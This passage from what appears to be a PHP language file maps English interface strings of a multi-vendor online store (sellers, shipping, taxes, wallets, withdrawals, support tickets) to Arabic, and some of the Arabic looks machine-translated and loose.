تشغيله', 'Seller Reports' => 'تقارير البائع', 'Seller Wallet Status' => 'وضع محفظة البائع', 'Seller product sale Report' => 'تقرير بيع منتج البائع', 'Seller product sale report' => 'تقرير بيع منتج البائع', 'Seller_Apply' => 'البائع تطبيق', 'Seller_Details' => 'تفاصيل البائع', 'Seller_Discount' => 'خصم البائع', 'Seller_Earning' => 'كسب البائع', 'Seller_Image' => 'صورة البائع', 'Seller_Info' => 'معلومات البائع', 'Seller_Information' => 'معلومات البائع', 'Seller_List' => 'قائمة البائع', 'Seller_Login' => 'تسجيل الدخول البائع', 'Seller_Net_Income' => 'صافي الدخل البائع', 'Seller_Order' => 'أمر البائع', 'Seller_POS_permission_on_or_off' => 'البائع POS إذن ON أو OFF', 'Seller_Product_List' => 'قائمة منتج البائع', 'Seller_Reg' => 'البائع ريج', 'Seller_Registration' => 'تسجيل البائع', 'Seller_Wallet' => 'محفظة البائع', 'Seller_Wallet_Status' => 'وضع محفظة البائع', 'Seller_details' => 'تفاصيل البائع', 'Seller_info' => 'معلومات البائع', 'Seller_registration' => 'تسجيل البائع', 'Seller_request_for_open_a_shop.' => 'طلب البائع لفتح متجر.', 'Sellers' => 'جميع البائعين', 'Send' => 'يرسل', 'Send a message' => 'ارسل رسالة', 'Send_Mail' => 'ارسل بريد', 'Send_Notification' => 'إرسال إشعار', 'Send_Reply' => 'إرسال الرد', 'Send_your_wallet_money_while_order' => 'أرسل أموال محفظتك أثناء الطلب', 'Sensitive_data! Make_sure_before_changing.' => 'بيانات حساسة! تأكد قبل التغيير.', 'Server Key' => 'مفتاح الخادم', 'Set Up' => 'يثبت', 'Set_Delivery_Address' => 'تعيين عنوان التسليم', 'Set_Form_Map' => 'تعيين خريطة النموذج', 'Set_Priority' => 'يضع أولويات', 'Set_from_map' => 'تعيين من الخريطة', 'Setting' => 'جلسة', 'Settings' => 'إعدادات', 'Settings updated!' => 'إعدادات تحديث!', 'Settings_updated' => 'الإعدادات تحديث', 'Setup' => 'يثبت', 'Share' => 'يشارك', 'Shipping' => 'شحن', 'Shipping Address Choose' => 'عنوان الشحن', 'Shipping Charge' => 'رسوم الشحن', 'Shipping Method' => 'طريقة الشحن', 'Shipping Method Update' => 'تحديث طريقة الشحن', 'Shipping Method deleted successfully' => 'تم حذف طريقة الشحن بنجاح', 'Shipping_Address' => 'عنوان الشحن', 'Shipping_And_Billing_Details' => 'تفاصيل الشحن والفوترة', 'Shipping_Charge' => 'رسوم الشحن', 'Shipping_Details' => 'تفاصيل الشحن', 'Shipping_Fee' => 'رسوم الشحن', 'Shipping_Method' => 'طريقة الشحن', 'Shipping_Method_Select' => 'طريقة الشحن حدد', 'Shipping_and_billing' => 'الشحن والفواتير', 'Shoes' => 'أحذية', 'Shop' => 'محل', 'Shop Edit' => 'تحرير متجر', 'Shop Name' => 'اسم المحل', 'Shop Page' => 'صفحة التسوق', 'Shop info updated successfully!' => 'تم تحديث معلومات التسوق بنجاح!', 'Shop name' => 'اسم المحل', 'Shop view' => 'عرض متجر', 'Shop_Again_From_Your_Recent_Store' => 'تسوق مرة أخرى من متجرك الأخير', 'Shop_Info' => 'معلومات التسوق', 'Shop_Information' => 'تسوق المعلومات', 'Shop_Name' => 'اسم المحل', 'Shop_Now' => 'تسوق الآن', 'Shop_Page' => 'صفحة التسوق', 'Shop_cover_Image' => 'صورة غلاف المتجر', 'Shop_wise_with' => 'تسوق مع', 'Shopping_And_Billing_Details' => 'تفاصيل التسوق والفوترة', 'Shopping_Details' => 'تفاصيل التسوق', 'Short title' => 'عنوان قصير', 'Show' => 'يعرض', 'Show data by date range' => 'إظهار البيانات حسب النطاق التاريخ', 'Show_Billing_Address_In_Checkout' => 'عرض عنوان الفواتير في الخروج', 'Show_Filter_Options' => 'إظهار خيارات المرشح', 'Show_Order' => 'ترتيب عرض', 'Show_Order = ' => 'ترتيب العرض=>', 'Show_Order_= ' => 'ترتيب العرض=>', 'Show_Product' => 'عرض المنتج', 'Show_as_featured' => 'تظهر كما هو مميز', 'Sidebar Banner' => 'شعار الشريط الجانبي', 'Sign out' => 'خروج', 'Sign_In' => 'تسجيل الدخول', 'Sign_Out' => 'خروج', 'Sign_Up' => 'اشتراك', 'Sign_in_First_to_Apply_Coupon' => 'تسجيل الدخول أولاً لتطبيق القسيمة', 'Silicone Strap Analogue Sports Watch Rectangular Dial New Model 2023 Men Watches' => 'حزام السيليكون التناظرية الرياضية ساعة الاتصال الهاتفي المستطيل طراز جديد 2023 رجال الساعات', 'Similar_Category_Product' => 'منتج فئة مماثل', 'Similar_Product_from_This_Store' => 'منتج مماثل من هذا المتجر', 'Single_vendor' => 'بائع واحد', 'Site Key' => 'مفتاح الموقع', 'Site URL' => 'URL الموقع', 'Size' => 'مقاس', 'Smart Watch' => 'ساعة ذكية', 'Smartphone' => 'هاتف ذكي', 'Sneakers man new design fabrics shoes with high lace up design and rubber materi' => 'أحذية أحذية رياضية جديدة تصميم أقمشة تصميم مع تصميم عالي الدانتيل والمواد المطاطية', 'Social Link Is Requeired' => 'الرابط الاجتماعي مطلوب', 'Social Login' => 'تسجيل الدخول الاجتماعي', 'Social Media' => 'وسائل التواصل الاجتماعي', 'Social Media Already taken' => 'وسائل التواصل الاجتماعي التي اتخذت بالفعل', 'Social Media inserted Successfully' => 'تم إدخال وسائل التواصل الاجتماعي بنجاح', 'Social Name Is Requeired' => 'الاسم الاجتماعي مطلوب', 'Social info updated Successfully' => 'تم تحديث المعلومات الاجتماعية بنجاح', 'Social media deleted Successfully' => 'تم حذف وسائل التواصل الاجتماعي بنجاح', 'Social-Media-Chatting' => 'وميديا التواصل الاجتماعي', 'Social_Media_Chat' => 'دردشة وسائل التواصل الاجتماعي', 'Social_Media_Chatting' => 'وسائل التواصل الاجتماعي الدردشة', 'Social_Media_Links' => 'روابط وسائل التواصل الاجتماعي', 'Social_Media_Login' => 'تسجيل الدخول إلى وسائل التواصل الاجتماعي', 'Software version' => 'إصدار البرنامج', 'Sold' => 'مُباع', 'Something went wrong!' => 'هناك خطأ ما!', 'Soon_Stock_Out' => 'قريبا تخزين', 'Sorry' => 'آسف', 'Sorry product is out of stock.' => 'المنتج آسف خارج المخزون.', 'Sorry product out of stock' => 'آسف، والمنتجات من المخزون', 'Sorry stock limit exceeded' => 'تم تجاوز الحد الأقصى للأسهم', 'Sorry the minimum order quantity does not match' => 'آسف لا تتطابق كمية الحد الأدنى للطلب', 'Sorry the minimum value was reached' => 'آسف تم الوصول إلى الحد الأدنى للقيمة', 'Sorry_Out_of_stock' => 'آسف، للخروج من الأسهم', 'Sorry_we_can`t_complete_your_order' => 'آسف لا يمكننا إكمال طلبك', 'Sort' => 'نوع', 'Sort_by' => 'ترتيب حسب', 'Standard_Delivery' => 'التسليم القياسية', 'Start' => 'يبدأ', 'Start Date' => 'تاريخ البدء', 'Start a conversation' => 'بدء محادثة', 'Start_Date' => 'تاريخ البدء', 'Start_From' => 'يبدأ من', 'State' => 'ولاية', 'Static Stock Limit' => 'حد الأسهم الثابت', 'Statistics' => 'إحصائيات', 'Status' => 'حالة', 'Status Change successfully' => 'تغيير الحالة بنجاح', 'Status Change successfully !' => 'تغيير الحالة بنجاح!', 'Status updated failed. Product must be approved' => 'فشل تحديث الحالة. يجب الموافقة على المنتج', 'Status updated successfully' => 'تم تحديث الحالة بنجاح', 'Status_updated_failed.' => 'فشل تحديث الحالة.', 'Stock_Available' => 'مخزون متاح', 'Stock_Not_Available' => 'الأسهم غير متوفرة', 'Stock_Status' => 'حالة الرصيد، وضع مخزون', 'Stock_not_available' => 'الأسهم غير متوفرة', 'Store' => 'محل', 'Store_Address' => 'عنوان المتجر', 'Store_Banner' => 'لافتة المتجر', 'Store_Bottom_Banner' => 'لافتة أسفل المتجر', 'Store_Client_ID' => 'تخزين معرف العميل', 'Store_Client_Secret_Key' => 'تخزين المفتاح السري للعميل', 'Store_List' => 'قائمة المتجر', 'Store_Logo' => 'متجر الشعار', 'Store_Name' => 'اسم المتجر', 'Store_Secondary_Banner' => 'متجر لافتة ثانوية', 'Story Book' => 'كتاب القصة', 'String' => 'خيط', 'Stripe' => 'شريط', 'Sub' => 'الفرعية', 'Sub Category' => 'تصنيف فرعي', 'Sub Category deleted Successfully.' => 'تم حذف الفئة الفرعية بنجاح.', 'Sub Sub Category' => 'الفئة الفرعية الفرعية', 'Sub Sub Category deleted Successfully.' => 'تم حذف الفئة الفرعية الفرعية بنجاح.', 'Sub type= I m not a robot Checkbox' => 'النوع الفرعي=> أنا لست مربع اختيار روبوت', 'Sub_Categories' => 'الفئات الفرعية', 'Sub_Category' => 'تصنيف فرعي', 'Sub_Category_deleted_Successfully.' => 'تم حذف الفئة الفرعية بنجاح.', 'Sub_Sub_Categories' => 'الفئات الفرعية الفرعية', 'Sub_Sub_Category_Deleted_Successfully' => 'تم حذف الفئة الفرعية الفرعية بنجاح', 'Sub_Title' => 'العنوان الفرعي', 'Sub_category' => 'تصنيف فرعي', 'Sub_sub_category' => 'الفئة الفرعية الفرعية', 'Sub_total' => 'مجموع', 'Subject' => 'موضوع', 'Submit' => 'يُقدِّم', 'Submit Reply' => 'اعتماد الرد', 'Submit message' => 'تقديم رسالة', 'Submit_a_Deliveryman_Review' => 'إرسال مراجعة التوصيل', 'Submit_a_review' => 'إرسال مراجعة', 'Subscribe to out neew channel to get latest updates' => 'اشترك في قناة Neew للحصول على آخر التحديثات', 'Subtotal' => 'نطاق فرعي', 'Super Store Online' => 'سوبر المتجر على الانترنت', 'Support' => 'يدعم', 'Support Ticket' => 'بطاقة الدعم', 'Support Ticket Answer' => 'دعم تذكرة الإجابة', 'Support Tickets' => 'تذاكر الدعم الفني', 'Support_Section' => 'قسم الدعم', 'Support_Ticket' => 'بطاقة الدعم', 'Support_Ticket_Inbox' => 'دعم صندوق التذاكر', 'System Default currency updated successfully!' => 'تم تحديث العملة الافتراضية للنظام بنجاح!', 'System Settings' => 'اعدادات النظام', 'System_Settings' => 'اعدادات النظام', 'System_Setup' => 'إعداد النظام', 'TAX' => 'ضريبة', 'TAX Exclude Product TAX Exclude Product TAX Exclude Product TAX Exclude Product' => 'استبعاد الضريبة على ضريبة المنتج استبعاد ضريبة المنتج استبعاد المنتج', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product' => 'تشمل الضريبة ضريبة المنتج تشمل ضريبة المنتج تشمل ضريبة المنتج على المنتج', 'TAX Include Product TAX Include Product TAX Include Product TAX Include Product ' => 'تشمل الضريبة ضريبة المنتج تشمل ضريبة المنتج تشمل ضريبة المنتج على المنتج', 'THANK YOU' => 'شكرًا لك', 'THANK_YOU' => 'شكرًا لك', 'TV & Home Appliance' => 'جهاز التلفزيون والأجهزة المنزلية', 'Table' => 'طاولة', 'Tax' => 'ضريبة', 'Tax Collected' => 'الضريبة التي تم جمعها', 'Tax Given' => 'الضريبة المعطاة', 'Tax_Collected' => 'الضريبة التي تم جمعها', 'Tax_Model' => 'نموذج الضرائب', 'Team ID' => 'معرف الفريق', 'Tech Light' => 'ضوء التكنولوجيا', 'Tech Shop' => 'متجر التكنولوجيا', 'Techno Lab' => 'مختبر تكنو', 'Television' => 'التلفاز', 'Tell us' => 'أخبرنا', 'Temporary OTP block time refers to a security measure implemented by systems to restrict access to OTP service for a specified period of time for wrong OTP submission.' => 'يشير وقت كتلة OTP المؤقت إلى مقياس أمان تنفذه الأنظمة لتقييد الوصول إلى خدمة OTP لفترة زمنية محددة لتقديم OTP الخاطئ.', 'Temporary login block time refers to a security measure implemented by systems to restrict access for a specified period of time for wrong Password submission' => 'يشير وقت كتلة تسجيل الدخول المؤقت إلى مقياس أمان تنفذه الأنظمة لتقييد الوصول لفترة زمنية محددة لتقديم كلمة المرور الخاطئة', 'Temporary_Closed' => 'مغلق مؤقت', 'Term_&_Conditions' => 'المصطلح والشروط', 'Terms & Condition' => 'البنود و الظروف', 'Terms & Conditions' => 'البنود و الظروف', 'Terms and Condition' => 'الأحكام والشروط', 'Terms_&_Conditions' => 'البنود و الظروف', 'Terms_&_Policy' => 'الشروط والسياسة', 'Terms_and_Conditions' => 'الأحكام والشروط', 'Test Product' => 'اختبار المنتج', 'Test_Email_Sender' => 'اختبار مرسل البريد الإلكتروني', 'Text' => 'نص', 'Thank_you_for_your_verification' => 'شكرا لك على التحقق الخاص بك', 'Thanks for your order' => 'شكرا لطلبك', 'The Wall' => 'الحائط', 'The billing period for your paid subscription to Google Workspace begins tomorrow.' => 'لطيف - جيد', 'The maximum OTP hit is a measure of how many times a specific one-time password has been generated and used within a time.' => 'الحد الأقصى لضرب OTP هو مقياس لعدد المرات التي تم فيها إنشاء كلمة مرور محددة لمرة واحدة واستخدامها في غضون وقت.', 'The maximum login hit is a measure of how many times a user can submit password within a time.' => 'إن الحد الأقصى لضرب تسجيل الدخول هو مقياس لعدد المرات التي يمكن للمستخدم إرسال كلمة المرور في كل مرة.', 'The_file_upload_field_is_required' => 'حقل تحميل الملف مطلوب', 'The_product_report_will_show_based_on_the_product_added_date' => 'سيظهر تقرير المنتج بناءً على تاريخ المنتج المضافة', 'Theme Changed to Theme Aster' => 'تم تغيير الموضوع إلى موضوع Aster', 'Theme Changed to Theme Fashion' => 'تغير الموضوع إلى الموضة الموضوع', 'Think before you proceed' => 'فكر قبل المتابعة', 'Third step' => 'خطوة ثالثة', 'This' => 'هذا', 'This Currency cannot be removed due to payment gateway dependency!' => 'لا يمكن إزالة هذه العملة بسبب تبعية بوابة الدفع!', 'This Month' => 'هذا الشهر', 'This Month s Statistics' => 'إحصائيات هذا الشهر', 'This Months Statistics' => 'هذه الإحصائيات أشهر', 'This Week' => 'هذا الاسبوع', 'This Year' => 'هذا العام', 'This Year Earning' => 'هذا العام يكسب', 'This is not an image file' => 'هذا ليس ملف صورة', 'This page is for A4 size page printer so it won t be visible in smaller devices' => 'هذه الصفحة لطابعة صفحة A4 Size ، لذا لن تكون مرئية في الأجهزة الأصغر', 'This_Month' => 'هذا الشهر', 'This_Week' => 'هذا الاسبوع', 'This_Year' => 'هذا العام', 'This_field_required' => 'هذا الحقل المطلوب', 'This_page_contains_sensitive_information.Make_sure_before_changing.' => 'تحتوي هذه الصفحة على معلومات حساسة. تأكد من التغيير.', 'This_page_is_having_sensitive_data.Make_sure_before_changing.' => 'هذه الصفحة لديها بيانات حساسة. تأكد من التغيير.', 'This_shop_is_in_temporary_closed' => 'هذا المتجر في مغلق مؤقت', 'This_shop_is_in_vacation_mode' => 'هذا المتجر في وضع العطلات', 'Title' => 'عنوان', 'To' => 'ل', 'To get site key and secret keyGo to the Credentials page' => 'للحصول على مفتاح الموقع وكيجو السري إلى صفحة بيانات الاعتماد', 'To_visit_your_currently_active_sms_gateway_settings_please_follow_the_link.' => 'لزيارة إعدادات بوابة الرسائل القصيرة النشطة حاليًا ، يرجى اتباع الرابط.', 'Today s Statistics' => 'إحصائيات اليوم', 'Todays Statistics' => 'إحصائيات اليوم', 'Todayâs_Best_Deal' => 'أفضل صفقة اليوم', 'Token' => 'رمز', 'Top' => 'قمة', 'Top Freezer Refrigerator' => 'ثلاجة فريزر أعلى', 'Top Side Banner' => 'لافتة الجانب العلوي', 'Top Stores' => 'أعلى المتاجر', 'Top_5_Product_Wise_Sale' => 'أفضل 5 منتجات منتجات حكيمة', 'Top_Delivery_Man' => 'أعلى رجل توصيل', 'Top_Fashion_House' => 'أعلى دار الأزياء', 'Top_Rated' => 'أعلى التقييمات', 'Top_Rated_Product_from_This_Store' => 'منتج أعلى تصنيف من هذا المتجر', 'Top_Rated_Products' => 'أعلى المنتجات تصنيف', 'Top_Rated_Seller' => 'أعلى تصنيف البائع', 'Top_Stores' => 'أعلى المتاجر', 'Top_selling_products' => 'أفضل منتجات البيع', 'Topic' => 'عنوان', 'Total' => 'المجموع', 'Total Amount' => 'المبلغ الإجمالي', 'Total Amount Sold' => 'إجمالي المبلغ المباع', 'Total Customers' => 'إجمالي العملاء', 'Total Discount Given' => 'إجمالي الخصم المعطى', 'Total Earning' => 'مجموع الأرباح', 'Total Earnings' => 'الأرباح الكلية', 'Total Expense' => 'المصاريف الكلية', 'Total In-House Products' => 'إجمالي المنتجات في المنزل', 'Total Order' => 'من أجل الكاملة', 'Total Orders' => 'إجمالي الطلبات', 'Total Price' => 'السعر الكلي', 'Total Product' => 'إجمالي المنتج', 'Total Products' => 'إجمالي المنتجات', 'Total Sale' => 'إجمالي البيع', 'Total Sales' => 'إجمالي المبيعات', 'Total Seller' => 'إجمالي البائع', 'Total Seller Products' => 'إجمالي منتجات البائع', 'Total Stock' => 'إجمالي الأسهم', 'Total Stores' => 'مجموع المتاجر', 'Total Transactions' => 'إجمالي المعاملات', 'Total in Wishlist' => 'المجموع في قائمة الأمنيات', 'Total orders of' => 'أوامر إجمالي', 'Total_Amount' => 'المبلغ الإجمالي', 'Total_Amount_Sold' => 'إجمالي المبلغ المباع', 'Total_Balance' => 'التوازن الكلي', 'Total_Commission_given' => 'إجمالي العمولة المعطاة', 'Total_Coupon_Discount' => 'إجمالي خصم القسيمة', 'Total_Delivery_Charge' => 'إجمالي رسوم التوصيل', 'Total_Deliveryman' => 'إجمالي التوصيل', 'Total_Discount_Given' => 'إجمالي الخصم المعطى', 'Total_Discounted_Amount' => 'إجمالي المبلغ المخفض', 'Total_Earning' => 'مجموع الأرباح', 'Total_Earnings' => 'الأرباح الكلية', 'Total_Expense' => 'المصاريف الكلية', 'Total_Expense_Amount' => 'إجمالي مبلغ النفقات', 'Total_In-House_Products' => 'إجمالي المنتجات في المنزل', 'Total_Order' => 'من أجل الكاملة', 'Total_Order_Amount' => 'إجمالي مبلغ الطلب', 'Total_Ordered_Product_Price' => 'إجمالي سعر المنتج المطلوب', 'Total_Orders' => 'إجمالي الطلبات', 'Total_Point' => 'النقطة الكلية', 'Total_Points' => 'مجمل النقاط', 'Total_Price_For_This_Product' => 'إجمالي سعر هذا المنتج', 'Total_Product' => 'إجمالي المنتج', 'Total_Product_Amount' => 'إجمالي مبلغ المنتج', 'Total_Product_Discount' => 'إجمالي خصم المنتج', 'Total_Product_Sale' => 'إجمالي بيع المنتج', 'Total_Products' => 'إجمالي المنتجات', 'Total_Quantity_Sold' => 'إجمالي الكمية المباعة', 'Total_Sale' => 'إجمالي البيع', 'Total_Sales' => 'إجمالي المبيعات', 'Total_Seller' => 'إجمالي البائع', 'Total_Seller_Products' => 'إجمالي منتجات البائع', 'Total_Shop' => 'مجموع المتجر', 'Total_Shop_Earnings' => 'إجمالي أرباح المتجر', 'Total_Store_Earnings' => 'إجمالي أرباح المتجر', 'Total_Stores' => 'مجموع المتاجر', 'Total_Tax' => 'مجموع الضريبة', 'Total_amount' => 'المبلغ الإجمالي', 'Total_refundable_amount' => 'إجمالي المبلغ القابل للاسترداد', 'Totals_Cost' => 'تكلفة الإجماليات', 'Toys Kids & Babies' => 'ألعاب الأطفال والرضع', 'Track' => 'مسار', 'Track Order' => 'ترتيب المسار', 'Track Order Result' => 'نتيجة ترتيب المسار', 'Track_Order' => 'ترتيب المسار', 'Track_Order_Result' => 'نتيجة ترتيب المسار', 'Track_Order_Result ' => 'نتيجة ترتيب المسار', 'Track_order' => 'ترتيب المسار', 'Transaction' => 'عملية', 'Transaction Date' => 'تاريخ الصفقة', 'Transaction Id' => 'رقم المعاملة', 'Transaction Statistics' => 'إحصائيات المعاملات', 'Transaction_Date' => 'تاريخ الصفقة', 'Transaction_History' => 'تاريخ المعاملة', 'Transaction_Report' => 'تقرير المعاملات', 'Transactions' => 'المعاملات', 'Translate' => 'يترجم', 'True' => 'حقيقي', 'TrueMake' => 'Truemake', 'Try after sometime' => 'حاول بعد وقت ما', 'Turn off' => 'أطفأ', 'Turn on' => 'شغله', 'Twitter' => 'تويتر', 'Twitter API Set up Instructions' => 'Twitter API إعداد التعليمات', 'Type' => 'يكتب', 'Type Answer' => 'اكتب الاجابة', 'Type Question' => 'اكتب السؤال', 'Type your message' => 'اكتب رسالتك', 'Type_your_message' => 'اكتب رسالتك', 'UPDATE_ADDRESSES' => 'تحديث العناوين', 'USE_COUPON' => 'استخدم قسيمة', 'Under_this_menu_you_can_setup_all_the_new_features_option_that_are_only_available_for_that_specific_theme.' => 'ضمن هذه القائمة ، يمكنك إعداد جميع خيار الميزات الجديدة المتاحة فقط لهذا الموضوع المحدد.', 'Unfollow' => 'الغاء المتابعة', 'Unfollow_Complete' => 'غير مكتمل', 'Unfollow_now' => 'غير متابع الآن', 'Unit' => 'وحدة', 'Unit Price' => 'سعر الوحدة', 'Unit is required!' => 'الوحدة مطلوبة!', 'Unit price' => 'سعر الوحدة', 'Unit_Price' => 'سعر الوحدة', 'Unit_Price_= ' => 'سعر الوحدة =>', 'Unit_price' => 'سعر الوحدة', 'Unpaid' => 'غير مدفوع الأجر', 'Upcoming_Campaign' => 'الحملة القادمة', 'Update' => 'تحديث', 'Update & Publish' => 'التحديث والنشر', 'Update Currency' => 'تحديث العملة', 'Update Deal' => 'تحديث الصفقة', 'Update Deal of The Day' => 'تحديث صفقة اليوم', 'Update Notification' => 'تحديث الاشعارات', 'Update Phone' => 'تحديث الهاتف', 'Update delivery-man' => 'تحديث تسليم رجل', 'Update option is disabled for demo' => 'تم تعطيل خيار التحديث للعروض التجريبية', 'Update your bank info first!' => 'قم بتحديث معلوماتك المصرفية أولاً!', 'Update_Address' => 'تحديث العنوان', 'Update_Deliveryman' => 'تحديث التسليم', 'Update_Profile' => 'تحديث الملف', 'Update_this_Address' => 'قم بتحديث هذا العنوان', 'Updated_Successfully' => 'تم التحديث بنجاح', 'Updated_successfully' => 'تم التحديث بنجاح', 'Updated_unsuccessful' => 'تحديث غير ناجح', 'Upload' => 'رفع', 'Upload product images' => 'تحميل صور المنتج', 'Upload thumbnail' => 'تحميل الصورة المصغرة', 'Upload_File' => 'رفع ملف', 'Upload_image' => 'تحميل الصور', 'Upload_product_images' => 'تحميل صور المنتج', 'Upload_thumbnail' => 'تحميل الصورة المصغرة', 'Urgent' => 'عاجل', 'Use the code to change your password on our secure website' => 'استخدم الرمز لتغيير كلمة المرور الخاصة بك على موقعنا الآمن', 'Used' => 'مستخدم', 'User' => 'مستخدم', 'User_Management' => 'إدارةالمستخدم', 'User_Not_Exist' => 'المستخدم غير متوفر', 'User_details' => 'بيانات المستخدم', 'Username' => 'اسم المستخدم', 'VAT' => 'ضريبة القيمة المضافة', 'VAT/TAX' => 'ضريبة القيمة المضافة', 'Vacation_End' => 'نهاية العطلة', 'Vacation_Mode' => 'وضع العطلة', 'Vacation_Note' => 'ملاحظة العطلة', 'Vacation_Start' => 'بداية الإجازة', 'Valid OAuth Redirect URIs' => 'OAUTT صالح إعادة توجيه URIS', 'Variant' => 'البديل', 'Variant Price' => 'سعر البديل', 'Variation' => 'تفاوت', 'Variations' => 'الاختلافات', 'Vat' => 'ضريبة القيمة المضافة', 'Verification code/ OTP mismatched' => 'رمز التحقق/ OTP غير متطابق', 'Verification_Code' => 'رمز التحقق', 'Verification_Successfully_Completed' => 'التحقق من التحقق بنجاح', 'Verify' => 'يؤكد', 'Verify your email' => 'قم بتأكيد بريدك الألكتروني', 'View' => 'منظر', 'View Order Details' => 'معاينة تفاصيل الطلب', 'View Products' => 'مشاهدة المنتجات', 'View_All' => 'عرض الكل', 'View_All_cart_items' => 'عرض جميع عناصر العربة', 'View_Less' => 'عرض أقل', 'View_More' => 'عرض المزيد', 'View_User_Message' => 'عرض رسالة المستخدم', 'View_all_cart_items' => 'عرض جميع عناصر العربة', 'View_more' => 'عرض المزيد', 'View_style_updated' => 'عرض النمط المحدث', 'Visit' => 'يزور', 'Visit Store' => 'قم بزيارة المعرض او المتجر', 'Visit_Again' => 'زورني مره اخرى', 'Visit_Shop' => 'زيارة متجر', 'Visit_Store' => 'قم بزيارة المعرض او المتجر', 'Vivatiqo' => 'vivatiqo', 'WISHLIST' => 'قائمة الرغبات', 'Wallet' => 'محفظة', 'Wallet Amount' => 'كمية المحفظة', 'Wallet Payments' => 'مدفوعات المحفظة', 'Wallet_Payments' => 'مدفوعات المحفظة', 'Waltro Vivobook X515ea intel core i3 1115g4 4GB DDR4 Ram 512GB' => 'Waltro Vivobook X515EA Intel Core I3 1115G4 4GB DDR4 RAM 512GB', 'Want to add this product' => 'تريد إضافة هذا المنتج', 'Want to delete this item' => 'تريد حذف هذا العنصر', 'Want_to_Add' => 'تريد إضافة', 'Want_to_Change_Default_Language_Status' => 'تريد تغيير حالة اللغة الافتراضية', 'Want_to_Remove' => 'تريد الإزالة', 'Want_to_Turn_OFF' => 'تريد إيقاف تشغيل', 'Want_to_Turn_OFF_Coupon_Status' => 'تريد إيقاف تشغيل حالة القسيمة', 'Want_to_Turn_OFF_Language_Status' => 'تريد إيقاف حالة اللغة', 'Want_to_Turn_OFF_Offline_Payment_Methods' => 'تريد إيقاف تشغيل طرق الدفع في وضع عدم الاتصال', 'Want_to_Turn_OFF_Support_Ticket_Status' => 'تريد إيقاف تشغيل حالة تذكرة الدعم', 'Want_to_Turn_ON' => 'تريد التشغيل', 'Want_to_Turn_ON_Coupon_Status' => 'تريد تشغيل حالة القسيمة', 'Want_to_Turn_ON_Language_Status' => 'تريد تشغيل حالة اللغة', 'Want_to_Turn_ON_Offline_Payment_Methods' => 'تريد تشغيل طرق الدفع في وضع عدم الاتصال', 'Want_to_Turn_ON_Support_Ticket_Status' => 'تريد تشغيل حالة تذكرة الدعم', 'Want_to_change_the_shipping_responsibility_to_Inhouse' => 'تريد تغيير مسؤولية الشحن إلى Inhouse', 'Want_to_delete_this_item' => 'تريد حذف هذا العنصر', 'Want_to_disable_the_Maintenance_Mode' => 'تريد تعطيل وضع الصيانة', 'Want_to_enable_the_Maintenance_Mode' => 'تريد تمكين وضع الصيانة', 'Want_to_order_your_usuals' => 'تريد أن تطلب عتيلك المعتاد', 'Want_to_unfollow_this_shop' => 'تريد إلغاء متابعة هذا المتجر', 'Warning' => 'تحذير', 'Watches' => 'ساعات', 'We are sorry the page you requested could not be found' => 'نحن آسفون على أن الصفحة التي طلبتها لا يمكن العثور عليها', 'We are sorry server is not responding' => 'نحن آسفون خادم لا يستجيب', 'We have sent you this email in response to your order placed. You will be able to see your order status after login to your account' => 'لقد أرسلنا لك هذا البريد الإلكتروني ردًا على طلبك. ستتمكن من رؤية حالة طلبك بعد تسجيل الدخول إلى حسابك', 'We have sent you this email to notify that you have a new order. You will be able to see your orders after login to your panel' => 'لقد أرسلنا لك هذا البريد الإلكتروني لإخطار أن لديك طلبًا جديدًا. ستتمكن من رؤية طلباتك بعد تسجيل الدخول إلى اللوحة الخاصة بك', 'We will email you a temporary code' => 'سنرسل لك رمزًا مؤقتًا بالبريد الإلكتروني', 'We will send email you a temporary code' => 'سنرسل لك رمزًا مؤقتًا عبر البريد الإلكتروني', 'We_Ensure_Quality_Support' => 'نحن نضمن دعم الجودة', 'We_Ensure_Secure_Transactions' => 'نحن نضمن المعاملات الآمنة', 'Wearable' => 'يمكن ارتداؤها', 'Web' => 'الويب', 'Web Config' => 'تكوين الويب', 'Web application' => 'تطبيق الويب', 'Web_&_App_Settings' => 'إعدادات الويب والتطبيق', 'Webcam' => 'كاميرا ويب', 'Website' => 'موقع إلكتروني', 'Website Color' => 'لون الموقع', 'Website Favicon' => 'موقع Favicon', 'Website Header Logo' => 'شعار رأس الموقع', 'Website Problem' => 'مشكلة الموقع', 'Website is under Maintenance' => 'الموقع قيد الصيانة', 'Website problem' => 'مشكلة الموقع', 'Website_Color' => 'لون الموقع', 'Website_Footer_Logo' => 'شعار تذييل الموقع', 'Website_problem' => 'مشكلة الموقع', 'Weekly' => 'أسبوعي', 'Weekly Delivery' => 'التسليم الأسبوعي', 'Welcome To' => 'مرحبا بك في', 'Welcome_message' => 'مرحبًا بالرسالة', 'Wellness Fair' => 'معرض العافية', 'WhatsApp' => 'Whatsapp', 'Wireless' => 'لاسلكي', 'Wireless Earbuds' => 'سماعات الأذن اللاسلكية', 'Wish_List' => 'قائمة الرغبات', 'Wish_Listed_Products' => 'أمنيات المنتجات المدرجة', 'Wishlist' => 'قائمة الرغبات', 'Wishlisted_Products' => 'المنتجات المدرجة في القائمة', 'Withdraw' => 'ينسحب', 'Withdraw Request' => 'طلب سحب', 'Withdraw Request Table' => 'سحب جدول طلب', 'Withdraw information View' => 'سحب معلومات المعلومات', 'Withdraw request process' => 'سحب عملية الطلب', 'Withdraw request sent successfully!' => 'تم إرسال طلب سحب بنجاح!', 'Withdraw_Request' => 'طلب سحب', 'Withdraw_Request_Table' => 'سحب جدول طلب', 'Withdrawable Balance' => 'توازن قابل للسحب', 'Withdrawable_balance' => 'توازن قابل للسحب', 'Withdrawal_Method' => 'طريقة السحب', 'Withdrawal_Methods' => 'طرق الانسحاب', 'Withdrawal_method_List' => 'قائمة طريقة السحب', 'Withdrawble Balance' => 'سحب التوازن', 'Withdrawble_Balance' => 'سحب التوازن', 'Women s fashion' => 'على الموضة للنساء', 'Women s long-sleeve lightweight french terry fleece quarter-zip top' => 'النساء الأكمام الطويلة خفيفة الوزن Terry Fleece Quarter-Zip Top', 'Write your message here...' => 'اكتب رسالتك هنا...', 'Write_something' => 'أكتب شيئا', 'Write_something ' => 'أكتب شيئا', 'XID' => 'XID', 'Yes' => 'نعم', 'Yes Change it' => 'نعم تغييره', 'Yes Change it!' => 'نعم تغييره!', 'Yes delete it' => 'نعم حذفه', 'Yes delete it!' => 'نعم حذفه!', 'Yes_delete_it' => 'نعم حذفه', 'You already subcribed this site!!' => 'لقد قمت بالفعل بتقديم هذا الموقع !!', 'You can download the example file to understand how the data must be filled' => 'يمكنك تنزيل ملف المثال لفهم كيفية ملء البيانات', 'You can download the example file to understand how the data must be filled.' => 'يمكنك تنزيل ملف المثال لفهم كيفية ملء البيانات.', 